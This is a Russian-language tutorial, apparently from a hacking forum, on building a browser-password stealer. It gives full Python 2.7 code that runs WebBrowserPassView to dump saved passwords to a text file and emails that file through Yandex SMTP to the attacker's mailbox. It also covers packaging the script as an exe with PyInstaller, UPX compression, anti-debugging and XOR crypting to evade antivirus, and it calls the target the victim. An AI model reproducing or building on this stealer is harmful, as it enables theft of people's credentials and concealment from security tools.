Стиллер на коленке.
Из чего будет состоять наш стиллер:
- Программа для восстановления паролей;
- Программы, которая запустит 1-ю программу и отправит нам эти пароли.
И так приступим мы собираем стиллер из паблик инструментов, плюс этого заключается в том, что скорее всего антивирусы не так сильно палят их если бы мы сами писали с нуля стиллер.
Выберем программу для восстановления паролей. Наиболее подходящая нам WebBrowserPassView(все ссылки в конце), но можно найти аналог. Прога поддерживает командную строку и возможность сохранять пароли в файле.
Программу выбрали, теперь нам необходимо написать небольшой скрипт, который будет обладать таким функционалом:
1)Откроет WebBrowserPassView и сохранит пароли в текстовик.
2)Отправит текстовик туда куда нам нужно.(я опишу случай отправки на email)
2.2) А можно просто запустить программу и сделать скрин экрана и отправить скрин.
Выбираем ЯП. Мы ребята ленивые и нестандартно мыслящие. Мы напишем на Python’e и скомпилируем exe’шник из него.(Это дебилизм, но весело).
PS: Я пытался написать тоже самое на bat и VSBasic. Были проблемы с брандмауэром, и прочие костыли. На питоне все заработало сразу+ можно расширить функционал.
Отправлять файл с паролями будем от яндекс почты. Mail ru не отправляет письма так как считает это спам рассылкой, гугл почта тоже может наставить рогули с безопасностью. А вот яндекс работает отлично.
Письмо(с паролями) отправляет [email protected] а принимает [email protected].
И так приступим к написанию скрипта.
Python 2.7
1)Импортируем библиотеки для работы с SMTP(штука для отправки писем), email(чтобы сформировать email сообщение), os(нужна чтобы запустить программу для востановления паролей) time(Сделать задержку по времени)
Код:
import smtplib import mimetypes import email import email.mime.application import os import time
2)Запуск программы WebBrowserPassView
Код:
os.system(r'WebBrowserPassView.exe /stext passwords.txt')
/stext сохранить в txt файл(/shtml/sxml на ваш вкус)
passwords.txt название файла в котором сохранятся пароли.
3)Делаем задержку в 5 сек. На случай если жертва начнет открывать несколько раз подряд наш файл.
Код:
time.sleep(5)
4)Формируем письмо
Код:
msg = email.mime.Multipart.MIMEMultipart() ##Тема msg['Subject'] = 'Greetings' ##От кого, кому msg['From'] = '[EMAIL][email protected][/EMAIL]' msg['To'] = '[email protected]'
5)Текст письма
body = email.mime.Text.MIMEText("""Hello, pass
passwords s s s?""")
msg.attach(body)
6)Прикрепряем файл с паролями
Код:
filename='passwords.txt' fp=open(filename,'rb') att = email.mime.application.MIMEApplication(fp.read(),_subtype="txt") fp.close() att.add_header('Content-Disposition','attachment',filename=filename) msg.attach(att)
7)Выбираем почтовый сервер. В нашем случае yandex.ru.
Код:
s = smtplib.SMTP('smtp.yandex.ru') s.starttls()
8)Логинемся на сервере
[ICODE]s.login('[email protected]','parol_ot_pochta')[/ICODE]
9)Отправляем письмо.
[ICODE]s.sendmail('[email protected]',['priem.gmail.com], msg.as_string())[/ICODE]
10)Закрываем сессию.
[ICODE]s.quit()[/ICODE]
Весь наш код
Код:
import smtplib import mimetypes import email import email.mime.application import os import time os.system(r'WebBrowserPassView.exe /stext passwords.txt') time.sleep(5) msg = email.mime.Multipart.MIMEMultipart() msg['Subject'] = 'Greetings' msg['From'] = '[EMAIL][email protected][/EMAIL]' msg['To'] = '[email protected]' body = email.mime.Text.MIMEText("""Hello, pass passwords s s s?""") msg.attach(body) filename='passwords.txt' fp=open(filename,'rb') att = email.mime.application.MIMEApplication(fp.read(),_subtype="txt") fp.close() att.add_header('Content-Disposition','attachment',filename=filename) msg.attach(att) s = smtplib.SMTP('smtp.yandex.ru') s.starttls() s.login('[email protected]','parol_ot_pochta') s.sendmail('[email protected]',['[email protected]], msg.as_string()) s.quit()
Проверяем….
Работает. Теперь из этой дичи нам необходимо собрать *exe.
Соберем при помощи Pyinstaller.
Где pyt.py это наш скрипт.
Создастся папка dist в ней будет наш pyt.exe причем весить будет порядка 5мб. Закинем в папку с pyt.exe файл WebBrowserPassView.exe.
Запускаем pyt.exe. Работает, создался файл passwords.txt и отправился на почту.
Теперь можно все это склеить, воспользоваться архиватором.
При помощи того же python'на я сразу создал exe с WebBrowserPassView в ресурсах, сделал запуск его и сжал upx'om. Вес стал порядка 3мб.
Тут уже без крипты никуда ибо палевность перед АВ высока. Делаем антиотладку, криптуем благо сильно загоняться тут не надо ведь у нас паблик инструменты и можно было даже обойтись обычным xor криптом.
Получаем интересного зверька.
Можно добавить еще функционала в нашу прогу. Можно собрать всю информацию о системе пользователя. Делать скрины экрана. Очень много чего.